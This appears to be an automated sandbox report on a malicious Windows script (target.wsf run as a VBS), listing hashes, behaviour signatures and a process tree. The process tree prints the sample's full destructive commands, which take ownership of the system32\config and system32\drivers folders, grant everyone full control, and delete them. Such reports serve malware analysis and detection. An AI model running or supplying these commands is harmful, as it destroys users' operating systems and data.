Analysis

  • max time kernel
    121s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    15-08-2024 21:37

General

  • Target

    target.wsf

  • Size

    2KB

  • MD5

    6425a144c5de5bc3bcd5865809150a0d

  • SHA1

    257d00e71e71832c90fc494b5121df3a8149560d

  • SHA256

    7c2461116f624799741f4983fb1bbb69c7c0024e7b258d8c79208669a75a69ad

  • SHA512

    95dd1168240a1e2011d45d2efe406ef88ee90140c97e9ec585fdd27ce15aa75a1479beae143a6d9717ed29002d818f165a2ad8910bc3b9ccc5d847024a173e34

Score
8/10

Malware Config

Signatures

  • Possible privilege escalation attempt 4 IoCs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "copy C:\Users\Admin\AppData\Local\Temp\target.wsf thescript.vbs && start thescript.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2512
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\thescript.vbs"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2264
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2796
        • C:\Windows\system32\takeown.exe
          takeown /f c:\windows\system32\config\*
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2608
        • C:\Windows\system32\icacls.exe
          icacls c:\windows\system32\config\* /grant everyone:(f)
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2744
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2844
        • C:\Windows\system32\takeown.exe
          takeown /f c:\windows\system32\drivers\*
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          • Suspicious use of AdjustPrivilegeToken
          PID:2564
        • C:\Windows\system32\icacls.exe
          icacls c:\windows\system32\drivers\* /grant everyone:(f)
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1804

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\thescript.vbs

    Filesize

    2KB

    MD5

    6425a144c5de5bc3bcd5865809150a0d

    SHA1

    257d00e71e71832c90fc494b5121df3a8149560d

    SHA256

    7c2461116f624799741f4983fb1bbb69c7c0024e7b258d8c79208669a75a69ad

    SHA512

    95dd1168240a1e2011d45d2efe406ef88ee90140c97e9ec585fdd27ce15aa75a1479beae143a6d9717ed29002d818f165a2ad8910bc3b9ccc5d847024a173e34

  • C:\Users\Admin\Desktop\ConvertFromUndo.vbs

    Filesize

    78B

    MD5

    ece02545122cc48c9d8afaf3f94dd04f

    SHA1

    8e07b6da685faad07f8413230a95ce0ae8987e0d

    SHA256

    5098743dbbd65767e7795bb819c00d091a749f0905fe0d496a06fc192efd0206

    SHA512

    e6c8df55b9845ea00301b0560321489cf064bfc02793495942e216a25f76b809a61d90ab0ce8ce4e514f626f368861c9f9b7814e3730e6482f0e2f40e88a2eb5